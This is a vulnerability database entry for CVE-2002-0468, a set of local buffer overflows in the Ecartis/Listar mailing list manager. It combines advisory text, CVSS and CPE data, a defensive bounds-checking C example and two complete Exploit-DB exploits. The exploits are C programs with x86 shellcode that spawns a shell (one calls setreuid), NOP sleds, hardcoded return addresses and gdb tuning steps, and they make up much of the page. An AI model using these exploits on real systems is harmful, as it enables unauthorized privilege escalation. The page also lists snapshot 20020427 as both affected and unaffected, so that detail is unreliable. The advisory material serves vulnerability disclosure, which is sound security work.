CVE-2002-0468
CVSS 4.6
Published: 2002-08-12 00:00:00
Revised: 2016-10-17 22:20:22

[Original] Buffer overflows in Ecartis (formerly Listar) 1.0.0 in snapshot 20020427 and earlier allow local users to gain privileges via (1) a long command line argument, which is not properly handled in core.c, or possibly via bad uses of sprintf() in (2) moderate.c, (3) lcgi.c, (4) fileapi.c, (5) cookie.c, (6) codes.c, or other files.


[CNNVD] Ecartis/Listar Multiple Local Buffer Overflow Vulnerabilities (CNNVD-200208-081)

        
        Ecartis and Listar are mailing list systems for Linux, BSD and other Unix operating systems; Ecartis is the new name of the Listar software.
        Because Ecartis and Listar perform insufficient boundary checking, multiple local buffer overflow attacks are possible.
        Multiple local buffer overflow conditions exist in some Ecartis versions. If successfully exploited, they can lead to execution of arbitrary code. Listar normally runs as the unprivileged user 'listar', so successful exploitation of these vulnerabilities may allow an attacker to launch further attacks with the privileges of the 'listar' user.
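The advisory above names two defect classes: a command-line argument copied into a fixed-size buffer without a length check (core.c) and unchecked sprintf() calls in other files. The following is an added example written for this page; it is not Ecartis or Listar source. The names copy_arg_checked, format_checked and ARG_BUF, the 1000-byte size and the sample arguments are all constructed to illustrate the bounds-checking pattern whose absence the advisory reports. The vulnerable form appears only as a comment; the two functions beside it reject over-long input outright and detect snprintf() truncation.

```c
#include <stdio.h>
#include <string.h>

/* Constructed frame size for the illustration; the advisory's 990/996-byte
 * figures describe a buffer of roughly this size, not this exact layout. */
#define ARG_BUF 1000

/* Vulnerable pattern the advisory describes (illustrative, NOT Ecartis' core.c):
 *
 *     char buf[ARG_BUF];
 *     sprintf(buf, "%s", argv[1]);    no bound: a longer argument overruns buf
 *
 * Kept as a comment so this file never performs the overflow. */

/* Hardened copy: refuse over-long input instead of truncating it.
 * Returns 0 on success, -1 when arg (plus its NUL) does not fit in dst. */
int copy_arg_checked(char *dst, size_t dstlen, const char *arg)
{
    const char *end;
    size_t n;

    if (dst == NULL || dstlen == 0 || arg == NULL)
        return -1;
    /* Look for the terminator within dstlen bytes only, so no more than
     * dstlen bytes of the argument are ever read. */
    end = memchr(arg, '\0', dstlen);
    if (end == NULL)
        return -1;                 /* no NUL in range: too long for dst */
    n = (size_t)(end - arg);
    memcpy(dst, arg, n + 1);       /* n + 1 <= dstlen, terminator included */
    return 0;
}

/* Hardened sprintf(): snprintf() with its return value checked.
 * snprintf() returns the length the full output would have had; a value
 * >= dstlen means the output was cut. Returns 0 on success, -1 on
 * truncation or encoding error, leaving dst as an empty string in that case. */
int format_checked(char *dst, size_t dstlen, const char *list, const char *cmd)
{
    int n;

    if (dst == NULL || dstlen == 0 || list == NULL || cmd == NULL)
        return -1;
    n = snprintf(dst, dstlen, "%s-%s", list, cmd);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed driver: a normal argument is accepted, a 1199-byte one
 * (longer than the 1000-byte buffer) is rejected. Returns 0 if both
 * outcomes are as expected, 1 otherwise. */
int demo(void)
{
    char buf[ARG_BUF];
    char longarg[ARG_BUF + 200];
    int ok_short, ok_long;

    memset(longarg, 'A', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';

    ok_short = copy_arg_checked(buf, sizeof buf, "mylist-subscribe");
    ok_long  = copy_arg_checked(buf, sizeof buf, longarg);
    return (ok_short == 0 && ok_long == -1) ? 0 : 1;
}

int main(void)
{
    char out[32];

    printf("copy check : %s\n", demo() == 0 ? "over-long argument rejected" : "unexpected result");
    printf("format ok  : %d\n", format_checked(out, sizeof out, "mylist", "subscribe"));
    printf("format cut : %d\n", format_checked(out, sizeof out, "a-very-long-list-name", "unsubscribe"));
    return 0;
}
```

Rejecting rather than silently truncating matters for a list manager: a truncated list name or command may still be "valid" and act on the wrong list. The memchr() bound means the checker never reads past dstlen bytes of the argument, and snprintf()'s return value is the only reliable truncation signal, because the destination is NUL-terminated whether or not the whole output fit.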
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:ecartis:ecartis:1.0.0_snapshot_2002-01-25
cpe:/a:listar:listar:0.129a
cpe:/a:ecartis:ecartis:1.0.0_snapshot_2002-01-21
cpe:/a:listar:listar:0.126a
cpe:/a:listar:listar:0.127a

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0468
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0468
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-081
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=listar-support&m=101590272221720&w=2
(UNKNOWN)  MISC  http://marc.info/?l=listar-support&m=101590272221720&w=2
http://online.securityfocus.com/archive/1/269658
(VENDOR_ADVISORY)  BUGTRAQ  20020425 ecartis / listar PoC
http://online.securityfocus.com/archive/1/269879
(VENDOR_ADVISORY)  BUGTRAQ  20020427 Response to KF about Listar/Ecartis Vulnerability
http://online.securityfocus.com/archive/82/258763
(VENDOR_ADVISORY)  VULN-DEV  20020227 listar / ecaris remote or local?
http://www.ecartis.org/
(UNKNOWN)  CONFIRM  http://www.ecartis.org/
http://www.iss.net/security_center/static/8445.php
(UNKNOWN)  XF  ecartis-local-bo(8445)
http://www.securityfocus.com/archive/1/261209
(UNKNOWN)  BUGTRAQ  20020310 Ecartis/Listar multiple vulnerabilities
http://www.securityfocus.com/bid/4271
(UNKNOWN)  BID  4271

- Vulnerability information

Ecartis/Listar Multiple Local Buffer Overflow Vulnerabilities
Severity: Medium; Type: Boundary Condition Error
Published: 2002-08-12 00:00:00; Updated: 2005-10-20 00:00:00
Attack vector: Local

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Strictly control local users' access to the program; make sure that only trusted users can run it.
        Vendor patches:
        Ecartis
        -------
        The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

        http://www.ecartis.org/

        Listar
        ------
        The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:

        http://www.listar.org/

- Vulnerability information (21341)

Ecartis 1.0.0 / Listar 0.129a Multiple Local Buffer Overflow Vulnerabilities (1) (EDBID:21341)
Platform: linux; Type: local
Date: 2002-02-27; Verified
Port: 0; Author: the itch
source: http://www.securityfocus.com/bid/4271/info

Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems.

Multiple local buffer overflow conditions have been reported in some versions of Ecartis. If successfully exploited, this may result in the execution of arbitrary code. Listar normally runs as the non-privileged user 'listar'. Exploitation of this vulnerability may allow the malicious party to launch further attacks against the system as the user 'listar'. 

/*
 * /home/listar-0.129a/listar
 *
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 *
 * 1) Buffer overflow occurs after writing 990 bytes into the buffer at the command line
 *    (990 to overwrite ebp, 996 to overwrite eip).
 * 2) The code string with the return address will be unaligned.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen(), memcpy(); missing in the original, needed to compile */

#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1000

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = 0xbffff4e0;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }

        printf("/home/listar-0.129a/listar\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize);

        /* alignment */
        ptr = buff + 2;

        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        buff[bsize -1] = '\0';
        memcpy(buff, "RET=", 4);
        memcpy(egg, "EGG=", 4);
        putenv(buff);
        putenv(egg);
        system("/home/listar-0.129a/listar $RET");

        return 0;
}
		

- Vulnerability information (21342)

Ecartis 1.0.0 / Listar 0.129a Multiple Local Buffer Overflow Vulnerabilities (2) (EDBID:21342)
Platform: linux; Type: local
Date: 2002-02-27; Verified
Port: 0; Author: the itch
source: http://www.securityfocus.com/bid/4271/info
 

/* 
 * /home/ecartis/ecartis
 *
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 * Shellcode created by r0z / Promisc (r0z@promisc.org)
 * 
 * This exploit was developed on the Snosoft vulnerability research machines
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 * 
 * 1) Buffer overflow occurs after writing 996 bytes into the buffer at the command line
 *    (996 to overwrite ebp, 1000 to overwrite eip).
 * 2) The code string with the return address will be unaligned.
 * 3) Shellcode will try to do a setreuid(508);
 *
 * I had trouble reaching my own buffer in the environment dynamically, so I gdb'ed it.
 * If the exploit fails, comment out the system() that runs ecartis and uncomment the other system().
 * Then run this exploit; you will be in bash then. Do: gdb /home/ecartis/ecartis
 * In gdb, type: run $RET
 * The program will probably then segfault; then type: x/200x $esp and press enter a couple of times
 * until you see a lot of 0x90909090. Then pick one of those addresses and replace it with the
 * int get_sp = 0xbffff550. Change the system() commands below back to how they were and rerun the exploit.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen(), memcpy(); missing in the original, needed to compile */

#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1000


/* setreuid(508); execve("/bin/sh", "sh", 0); (c) r0z@promisc.org */
char shellcode[] =
         "\x31\xdb"              /* xor   %ebx, %ebx     */
         "\x31\xc9"              /* xor   %ecx, %ecx     */
         "\xf7\xe3"              /* mul   %ebx           */
         "\xb0\x46"              /* mov   $0x46, %al     */
         "\x66\xbb\xfc\x01"      /* mov   $0x1fc, %bx    */
         "\x49"                  /* dec   %ecx           */
         "\xcd\x80"              /* int   $0x80          */
         "\x31\xd2"              /* xor   %edx, %edx     */
         "\x52"                  /* push  %edx           */
         "\x68\x6e\x2f\x73\x68"  /* push  $0x68732f6e    */
         "\x68\x2f\x2f\x62\x69"  /* push  $0x69622f2f    */
         "\x89\xe3"              /* mov   %esp, %ebx     */
         "\x52"                  /* push  %edx           */
         "\x53"                  /* push  %ebx           */
         "\x89\xe1"              /* mov   %esp, %ecx     */
         "\x6a\x0b"              /* pushl $0xb           */
         "\x58"                  /* pop   %eax           */
         "\xcd\x80";             /* int   $0x80          */

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = 0xbffff550;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }
	
        printf("/home/ecartis/ecartis\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize);

        /* alignment */
        ptr = buff + 2;

        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);
        buff[bsize - 1] = '\0';
        memcpy(buff, "RET=", 4);
        putenv(buff);
        system("/home/ecartis/ecartis $RET");
//      system("/bin/bash");

        return 0;
}
		

- Vulnerability information

10425
Ecartis Multiple Function Local Overflows
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Timeline

2002-03-10 Unknown
2002-03-10 Unknown

- Solution

Products

Unknown or Incomplete

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Ecartis/Listar Multiple Local Buffer Overflow Vulnerabilities
Class: Boundary Condition Error; Bugtraq ID: 4271
Remote: No; Local: Yes
Published: 2002-02-27 12:00:00; Updated: 2009-07-11 11:56:00
Credit: Discovered by KF <dotslash@snosoft.com>. Additional details published by Janusz Niewiadomski (funkysh@isec.pl) and Wojciech Purczynski (cliph@isec.pl).

- Affected versions

Listar 0.129a
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
Listar 0.127a
Listar 0.126a
Ecartis 1.0.0 snapshot 20020125
Ecartis 1.0.0 snapshot 20020121
Ecartis 1.0.0 snapshot 20020427

- Unaffected versions

Ecartis 1.0.0 snapshot 20020427

- Vulnerability discussion

Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems.

Multiple local buffer overflow conditions have been reported in some versions of Ecartis. If successfully exploited, this may result in the execution of arbitrary code. Listar normally runs as the non-privileged user 'listar'. Exploitation of this vulnerability may allow the malicious party to launch further attacks against the system as the user 'listar'.

- Exploit

The Itch <itchie@promisc.org> and KF <dotslash@snosoft.com> have provided the following exploits:

- Solution

The Ecartis snapshot as of Apr 27, 2002 has been reported to fix all known issues. Users of Listar are advised to upgrade to Ecartis.


Listar 0.129a
Ecartis 1.0.0 snapshot 20020121
Ecartis 1.0.0 snapshot 20020125
